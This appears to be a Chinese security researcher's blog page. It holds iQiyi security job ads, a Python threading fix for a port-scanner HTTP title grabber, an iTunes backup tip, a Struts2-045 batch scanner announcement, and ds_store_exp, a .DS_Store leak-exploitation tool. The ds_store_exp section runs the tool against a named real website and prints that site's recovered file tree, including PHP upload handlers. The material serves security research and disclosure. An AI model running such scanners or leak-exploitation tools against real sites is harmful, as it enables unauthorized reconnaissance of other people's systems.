招聘安全服务开发工程师 – 北京
爱奇艺安全团队在北京招聘 安全服务开发工程师1名,
主要负责公司内部安全服务平台的开发和优化:SIEM、态势感知、入侵检测、堡垒机、扫描平台等。 欢迎投递简历! lijiejie[at]qiyi.com
要求:
1. 熟练掌握Python,熟悉Django等web框架。 了解AngularJS等前端框架
2. 熟悉 Linux 操作系统, 熟悉常见算法和数据结构
3. 熟练使用MySQL,掌握查询优化; 熟练使用MongoDB
4. 熟悉RabbitMQ/ActiveMQ/RocketMQ、Redis、Kafka 等消息中间件,了解Elasticsearch,了解Docker
5. 有安全攻防经验优先、有海量数据处理和分析经验优先
(已过期)爱奇艺北京招聘 安全分析工程师 / 安全服务开发工程师
安全分析工程师(71SRC) – 北京
岗位职责:
实施Web/移动APP、内外网主机和应用安全测试,输出测试报告和修复建议,跟进业务修复
安全事件应急响应,及时分析、验证、报告、溯源外部威胁和情报
跟进最新安全漏洞,驱动业务团队修复,协助验证
开发和增强现有的扫描系统和应急响应工具链
任职要求:
本科及以上学历
像黑客一样思考, 参加过CTF的优先, 在各SRC提交过漏洞的优先
掌握Python和Linux Shell
熟悉OWASP TOP10, 熟悉Android IOS安全机制的优先
熟悉汇编、反编译、脱壳、Hook和加解密技术更佳,能熟练使用IDA等逆向分析工具更佳
安全服务开发工程师-北京
岗位职责:
开发和维护内部安全服务: 堡垒机、 SIEM、 入侵检测、 蜜罐、态势感知服务、抗D服务
负责海量安全样本数据的提取,分析,挖掘,和总结
任职要求:
计算机和信息安全相关专业,本科及以上学历,有安全专业背景更佳
熟练Java或Python及常用 Web 开发框架的优先
熟悉Linux下的C程序开发者优先
熟悉 Linux 操作系统、 TCP/IP网络协议,熟悉网络包处理
有安全项目经验优先
薪资福利
薪资:20-40K
福利:
舒适的工作环境, 免费茶饮咖啡, 12天带薪休假
免费体检, 五险一金, 补充医疗、子女补充医疗, 人身意外伤害险
定期团建活动, 每月生日party, 各类员工活动俱乐部. 丰富的年节活动, 午餐补助、交通补助
内部优惠, 结婚生育礼金, 创意基金, 完善的晋升机制, 各类前沿培训课程
投递邮箱: lijiejie[at]qiyi.com
requests.get 异常hang住
这两天优化端口扫描脚本,在获取HTTP页面内容时,发现requests.get hang住了(之前httplib不会)。
requests.get 提供了超时参数timeout,但在实际使用过程中,仍发现get请求可能被hang住。
原因在于非HTTP Server,response中一直没有出现换行符\n,导致_read_status()在获取状态码的时候就hang住了。
一个简单的解决方法,可以创建新的线程,示例代码参考如下,这部分代码是无法直接工作的:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
def do_get_thread(url, ret): try: headers = { 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 ' '(KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25', 'Range': 'bytes=0-10240', 'Connection': 'Close'} ret.append(requests.get(url, headers=headers, timeout=(4, 30))) except: pass def get_http_title(ip, port, service, log_queue): if service.lower().find('https') >= 0 or service.lower().find('ssl') >= 0: service = 'https' else: service = 'http' url = '%s://%s:%s' % (service, ip, port) msg = 'Get http title %s' % url log_queue.put(msg) try: start_time = time.time() ret = [] t = threading.Thread(target=do_get_thread, args=(url, ret)) t.daemon = True t.start() while t.isAlive(): if time.time() - start_time > 31: log_queue.put('[get_http_title timed out] %s' % url) return {}, '' else: time.sleep(1.0) if not ret: return {}, '' resp = ret[0] headers = resp.headers m = re.search('<title>(.*?)</title>', resp.text, re.IGNORECASE) http_title = m.group(1).strip() if m else '' if http_title: http_title = decode_response_text(http_title) else: http_title = resp.text.replace('\n', ' ').strip()[0:200] return headers, http_title except requests.exceptions.RequestException, e: pass except Exception, e: log_queue.put('[get_http_title.exception] %s' % str(e)) return {}, '' |
Struts2-045漏洞批量扫描工具
一个 Struts2-045漏洞批量扫描工具
https://github.com/lijiejie/struts2_045_scan
Requirements
|
1 2 |
pip install requests |
Usage
|
1 2 3 4 5 6 7 8 9 |
usage: scan.py [options] Struts2-045 Scanner. By LiJieJie (http://www.lijiejie.com) optional arguments: -h, --help show this help message and exit -f File New line delimited targets from File -t THREADS Num of scan threads, 100 by default |
Screenshot
iTunes 更改备份文件保存路径
建议使用iPhone的同学周期性地备份自己的手机,以免意外数据丢失。
使用iTunes备份手机到电脑上,win系统默认是保存在系统盘 C盘的。
我购置了240G固态硬盘,C盘只有120G,多备份几次就被耗尽了。
观察到iTunes无法配置备份文件路径,那么我们可以移动文件到一个更大的盘符下(例如我的G盘,是机械硬盘的分区),之后再创建一个目录连接到C盘对应目录即可。
移动文件夹
“C:\Users\Administrator\AppData\Roaming\Apple Computer\MobileSync\Backup”
到
“G:\iphone\Backup”
然后创建一个目录连接
mklink /J “C:\Users\Administrator\AppData\Roaming\Apple Computer\MobileSync\Backup” “G:\iphone\Backup”
Ref: https://discussions.apple.com/thread/4977359?tstart=0
.DS_Store文件泄漏利用工具: ds_store_exp
.DS_Store是Mac下Finder用来保存如何展示 文件/文件夹 的数据文件,每个文件夹下对应一个。
如果开发/设计人员将.DS_Store上传部署到线上环境,可能造成文件目录结构泄漏,特别是备份文件、源代码文件。
ds_store_exp 是一个.DS_Store 文件泄漏利用脚本,它解析.DS_Store文件并递归地下载文件到本地: https://github.com/lijiejie/ds_store_exp
DS_Store parser is based on ds_store 1.1.0 。
一个示例
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 |
python ds_store_exp.py http://hd.zj.qq.com/themes/galaxyw/.DS_Store hd.zj.qq.com/ └── themes └── galaxyw ├── app │ └── css │ └── style.min.css ├── cityData.min.js ├── images │ └── img │ ├── bg-hd.png │ ├── bg-item-activity.png │ ├── bg-masker-pop.png │ ├── btn-bm.png │ ├── btn-login-qq.png │ ├── btn-login-wx.png │ ├── ico-add-pic.png │ ├── ico-address.png │ ├── ico-bm.png │ ├── ico-duration-time.png │ ├── ico-pop-close.png │ ├── ico-right-top-delete.png │ ├── page-login-hd.png │ ├── pic-masker.png │ └── ticket-selected.png └── member ├── assets │ ├── css │ │ ├── ace-reset.css │ │ └── antd.css │ └── lib │ ├── cityData.min.js │ └── ueditor │ ├── index.html │ ├── lang │ │ └── zh-cn │ │ ├── images │ │ │ ├── copy.png │ │ │ ├── localimage.png │ │ │ ├── music.png │ │ │ └── upload.png │ │ └── zh-cn.js │ ├── php │ │ ├── action_crawler.php │ │ ├── action_list.php │ │ ├── action_upload.php │ │ ├── config.json │ │ ├── controller.php │ │ └── Uploader.class.php │ ├── ueditor.all.js │ ├── ueditor.all.min.js │ ├── ueditor.config.js │ ├── ueditor.parse.js │ └── ueditor.parse.min.js └── static ├── css │ └── page.css ├── img │ ├── bg-table-title.png │ ├── bg-tab-say.png │ ├── ico-black-disabled.png │ ├── ico-black-enabled.png │ ├── ico-coorption-person.png │ ├── ico-miss-person.png │ ├── ico-mr-person.png │ ├── ico-white-disabled.png │ └── ico-white-enabled.png └── scripts ├── js └── lib └── jquery.min.js 21 directories, 48 files |
近期评论